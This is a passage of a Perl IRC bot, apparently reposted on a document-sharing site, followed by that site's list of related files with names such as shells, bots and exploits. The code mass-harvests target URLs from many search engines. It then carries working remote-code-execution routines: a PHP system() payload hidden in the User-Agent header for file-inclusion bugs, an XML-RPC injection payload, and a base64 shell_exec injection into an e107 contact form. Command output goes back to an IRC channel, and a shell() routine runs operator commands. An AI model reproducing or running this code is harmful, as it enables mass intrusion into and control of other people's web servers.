@clean; } ################################################################################ ## sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = &get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req);
return $res->content; } ######################################### SEARCH ENGINE sub Indo1() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo1.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo2() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo2.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo3() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo3.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo4() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo4.uri_escape($key)."&num=100&start=".$i);
my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo5() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo5.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo6() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo5.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=1 00&filter=0&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } }
} return @list; } sub walla() { my @list; my $key = $_[0]; for ($b=0; $b<=100; $b+=1) { my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=te xt&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /walla\.co\.il/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub yahoo(){ my @list; my $key = $_[0]; for ($b=1; $b<=1000; $b+=10) { my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=" .$b); my $res = &search_engine_query($search); while ($res =~ m/http\%3a\/\/(.+?)\"/g) { my $link = $1; if ($link !~ /yahoo\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub ask() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=100) { my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc =1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss="); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /ask\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub onet() { my @list;
my $key = $_[0]; my $b = 0; for ($b=1; $b<=400; $b+=10) { my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_ escape($key)); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=200; $b+=10) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v %3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state= root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /yippy\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=400; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=" .$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /google/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub sapo(){ my @list; my $key = $_[0]; for ($b=1; $b<=50; $b+=1) {
my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=ht ml&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local"); my $res = &search_engine_query($search); if ($res !~ m/Next/i) {$b=50;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /\.sapo\.pt/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub lycos() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$ b); my $res = &search_engine_query($search); while ($res =~ m/title=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /lycos\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub uol() { my @list; my $key = $_[0]; for ($b=0; $b<=1000; $b+=10) { my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($ key)."&start=".$b); my $res = &search_engine_query($search); if ($res =~ m/retornou nenhum resultado/i) {$b=500;} while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /uol\.com\.br|\/web/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=300; $b+=20) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20& from=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
my $link = $1; if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/ i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub hotbot() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape ($key)); my $res = &search_engine_query($search); if ($res =~ m/had no web result/i) {$b=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /hotbot\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub aol() { my @list; my $key = $_[0]; for ($b=0; $b<=300; $b+=10) { my $search = ("http://search.aol.com/aol/search?q=".uri_escape($ key)."&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /aol\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub biglobe { my $key = $_[0]; my @list; for ($b=1; $b<=500; $b+=10) { $num += $num; my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=". $b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all"; my $res = &search_engine_query($search); while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) { my $link = $1; if ($link !~ /biglobe/){ my @grep = &links($link);
push(@list,@grep); } } } return @list; } ######################################### sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; push @cln, $element; } return @cln; } sub links() { my @list; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push(@list,$link,$host,$hdir); return @list; } sub search_engine_query() { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", Peer Port=>"80", Proto=>"tcp") or return; my $sget = "GET $query HTTP/1.0\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Accept: */*\r\n"; $sget .= "User-Agent: $uagent\r\n"; $sget .= "Connetion: Close\r\n\r\n"; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); };
return $page; } ######################################### sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub cmdlfi() { my $browser = LWP::UserAgent->new; my $url = $_[0]; my $cmd = $_[1]; my $chan = $_[2]; my $hie = "kulo<?system(\"$cmd 2> /dev/stdout\"); ?>nuwun"; $browser->agent("$hie"); $browser->timeout(7); $response = $browser->get( $url ); if ($response->content =~ /kulo(.*)nuwun/s) { &msg("$chan","$lfilogo12 ".$1." "); } else { &msg("$chan","$lfilogo15 No Output ");
} } sub cmdxml() { my $jed = $_[0]; my $dwa = $_[1]; my $chan = $_[2]; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'kulo';system('".$dwa."');echo'nuwun';exit;/*</name></v alue></param></params></methodCall>"; my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit); if ($response->content =~ /kulo(.*)nuwun/s) { &msg("$chan","$xmllogo12 $1 "); } else { &msg("$chan","$xmllogo15 No Output "); } } sub cmde107() { my $path = $_[0]; my $code = $_[1]; my $chan = $_[2]; my $codecmd = encode_base64($code); my $cmd = 'echo(base64_decode("S3VMbw==").shell_exec(base64_decode("aWQ=")).base 64_decode("S3Vsb05ldA==")).shell_exec(base64_decode("'.$codecmd.'"));'; my $req = HTTP::Request->new(POST => $path); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B %5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /KuloNet(.*)/ ){ $mydata = $1; &msg("$chan","0,1(0E1070)4 $mydata"); } else { &msg("$chan","0,1(0E1070)4 No Output"); } }
You might also like
- ScanDocument51 pagesScanDiheCk MantabNo ratings yet
- ScaxDocument39 pagesScaxzobbylaNo ratings yet
- M PHPDocument54 pagesM PHPMary Rose AgualinNo ratings yet
- AaaDocument121 pagesAaarubi vilmaNo ratings yet
- IRC Bot v2.2Document7 pagesIRC Bot v2.2FrankNo ratings yet
- TryagDocument28 pagesTryagSteven BrownNo ratings yet
- Script For Creating Instances AutomaticallyDocument30 pagesScript For Creating Instances Automaticallysss pppNo ratings yet
- Y Mina RelockDocument8 pagesY Mina Relockfqwaszx43No ratings yet
- Bootscanv 6Document3 pagesBootscanv 6MuhammadFirmanNo ratings yet
- Reverse ShellDocument27 pagesReverse ShellandersonvieiratiNo ratings yet
- BotDocument111 pagesBotjackvengeanceNo ratings yet
- Bot ScannerDocument31 pagesBot ScannerRolando LewandoswkyNo ratings yet
- Radware to F5 Configuration ConverterDocument8 pagesRadware to F5 Configuration ConverterHarry ShNo ratings yet
- HwdexplDocument238 pagesHwdexplIrda Diana HakimNo ratings yet
- Untitled 1Document2 pagesUntitled 1Hue NguyenNo ratings yet
- Gojek API PHP FunctionsDocument5 pagesGojek API PHP FunctionsLuluk MasUdahNo ratings yet
- TR Ya GDocument29 pagesTR Ya Gmad_707No ratings yet
- R 57 ShellDocument48 pagesR 57 Shellapi-17231358No ratings yet
- PHPBB3 ExploitDocument6 pagesPHPBB3 ExploitxcodeindiaNo ratings yet
- New Webshare CodeDocument2 pagesNew Webshare CodevostderzheNo ratings yet
- Open The DorDocument9 pagesOpen The Dorgumaj hostguru topNo ratings yet
- MiniDocument99 pagesMiniAnonymous T6b3GDNo ratings yet
- New 1 BocilDocument8 pagesNew 1 Bocilkiyalpaker21No ratings yet
- PHP injection shell detection documentDocument124 pagesPHP injection shell detection documentIgor EduardoNo ratings yet
- Priv 8Document37 pagesPriv 8Julio PetersNo ratings yet
- PHP CodeExample PDFDocument2 pagesPHP CodeExample PDFRevanth Kumar TummalacherlaNo ratings yet
- c99 PHPDocument71 pagesc99 PHPegyhackerNo ratings yet
- CheckerDocument18 pagesCheckerVanessa RamosNo ratings yet
- Configure VPN ServerDocument13 pagesConfigure VPN ServerMauro EspinozaNo ratings yet
- Final PHP CodeDocument16 pagesFinal PHP Codeaabapurbo2083No ratings yet
- Trace Netbackup User ActivityDocument2 pagesTrace Netbackup User ActivityMahek AroraNo ratings yet
- Dorker PHPDocument2 pagesDorker PHPGunawan JayantoNo ratings yet
- ShadowsocksR VPN ScriptDocument7 pagesShadowsocksR VPN ScriptGurban BabayewNo ratings yet
- AppleDocument4 pagesAppleAl IkhlashNo ratings yet
- VestaCP APIDocument17 pagesVestaCP APIPredrag DamnjanovićNo ratings yet
- Check SNMP LoadDocument13 pagesCheck SNMP LoadDj BenNo ratings yet
- Howtochangeip ScriptDocument2 pagesHowtochangeip Scriptmalakawj8105No ratings yet
- UntitledDocument155 pagesUntitledpriyait182No ratings yet
- Iostat Monitoring For ZenossDocument4 pagesIostat Monitoring For ZenossMai ThuNo ratings yet
- DanushDocument127 pagesDanushAnonymous bQ25lDxtl0% (1)
- Zabbix TSMDocument5 pagesZabbix TSMgilvandroliraNo ratings yet
- UbhfvDocument2 pagesUbhfvAri DwiNo ratings yet
- C 99 ShellDocument102 pagesC 99 ShellJaja JsjsNo ratings yet
- cc.class.phpDocument3 pagescc.class.phpnoncorvNo ratings yet
- Image Processing ScriptsDocument16 pagesImage Processing ScriptsVeeru MudirajNo ratings yet
- Credentials LoggedDocument10 pagesCredentials LoggedAbdul RabieNo ratings yet
- Codigo Java pr4Document3 pagesCodigo Java pr4Tokoku NavaraNo ratings yet
- Pesan 3296Document128 pagesPesan 3296Achmad YusufNo ratings yet
- 2008 PHP PHPDocument39 pages2008 PHP PHPpsymeraNo ratings yet
- WordPress Mass Defacer - Joomla Mass Defacer - PHP Mass Hack ScriptDocument14 pagesWordPress Mass Defacer - Joomla Mass Defacer - PHP Mass Hack ScriptAnonymous V29XBzrhNo ratings yet
- c99 PHPDocument65 pagesc99 PHPShu BhumNo ratings yet
- ADocument2 pagesARicoNo ratings yet
- ADocument447 pagesAFeri PahriansyaNo ratings yet
- WsoDocument37 pagesWsozenchuaNo ratings yet
- Build your own Blockchain: Make your own blockchain and trading bot on your pcFrom EverandBuild your own Blockchain: Make your own blockchain and trading bot on your pcNo ratings yet
- v-Myb proteins and their oncogenic potential: A study on how two point mutations affect the interaction of v-Myb with other proteinsFrom Everandv-Myb proteins and their oncogenic potential: A study on how two point mutations affect the interaction of v-Myb with other proteinsNo ratings yet
- Empowerment Technologies: Prepared By: Karl Kevin C BaconDocument37 pagesEmpowerment Technologies: Prepared By: Karl Kevin C BaconAngelo CenizaNo ratings yet
- Html5 PDFDocument151 pagesHtml5 PDFfelix557700100% (2)
- KoolChart 1.5 UserDocument141 pagesKoolChart 1.5 UserHimanshu MishraNo ratings yet
- Payload MovistarDocument1 pagePayload Movistarmarco vazquez sartaNo ratings yet
- XpoZ TorrentDocument5 pagesXpoZ TorrentRao UmarNo ratings yet
- Funk LoadDocument19 pagesFunk LoadPedro AraújoNo ratings yet
- Setup S3 Website AWS CLIDocument3 pagesSetup S3 Website AWS CLIdeniz bayraktarNo ratings yet
- Chapter 1 - Introduction To MultimediaDocument36 pagesChapter 1 - Introduction To MultimediaNor HidayahNo ratings yet
- Test 3Document5 pagesTest 3StefanNo ratings yet
- 1633 - ASM2 - Nguyen Dang Khanh HangDocument81 pages1633 - ASM2 - Nguyen Dang Khanh HangNguyễn Đặng Khánh HằngNo ratings yet
- Name: - Shivam Sharma Roll No: - 08: - Index - HTMLDocument18 pagesName: - Shivam Sharma Roll No: - 08: - Index - HTMLShivam Sharma and crewNo ratings yet
- Using Urls in Cognos 8Document20 pagesUsing Urls in Cognos 8ijagdishraiNo ratings yet
- HTML Interview Questions And Answers GuideDocument28 pagesHTML Interview Questions And Answers GuideVikas SinghNo ratings yet
- FDocument80 pagesFVesna Njegovan BoskovskaNo ratings yet
- 10 Different Methods To Make Money OnlineDocument4 pages10 Different Methods To Make Money OnlineRidhi RanjanNo ratings yet
- Web Technologies Black BookDocument1 pageWeb Technologies Black BookDreamtech Press0% (8)
- MignonDocument28 pagesMignonnekodustNo ratings yet
- The Perfect Site GuideDocument59 pagesThe Perfect Site GuideconstantrazNo ratings yet
- The Deep WebDocument24 pagesThe Deep Webkc100% (1)
- 123Document110 pages123oRmKalessiNNo ratings yet
- How to remove an SOA module from a CSM Web Archive fileDocument144 pagesHow to remove an SOA module from a CSM Web Archive fileshivam_bansalNo ratings yet
- Wolfgang Digital E Commerce KPI Report 2014Document29 pagesWolfgang Digital E Commerce KPI Report 2014Ivan Felipe MejiaNo ratings yet
- CMSC 426 - Lec22Document27 pagesCMSC 426 - Lec22Micah KNo ratings yet
- Website ProposalDocument8 pagesWebsite ProposalSecond YouTube100% (1)
- 1.8.html and CssDocument3 pages1.8.html and CssasdfNo ratings yet
- Advanced Web Store Using PHP - MySQL - Free Source Code, Tutorials and ArticlesDocument8 pagesAdvanced Web Store Using PHP - MySQL - Free Source Code, Tutorials and Articlessatriadi pounderNo ratings yet
- (CTS +) Finally in SAP Cloud Platform - IS! - SAP BlogsDocument9 pages(CTS +) Finally in SAP Cloud Platform - IS! - SAP Blogsvikas_anne_1No ratings yet
- Etech Lesson1Document2 pagesEtech Lesson1Roderick RichardNo ratings yet
- Digital Assignment - IDocument10 pagesDigital Assignment - Imsroshi madhuNo ratings yet
- Chapter 6 - Introduction To InternetDocument14 pagesChapter 6 - Introduction To InternetMadarwi SarwaNo ratings yet
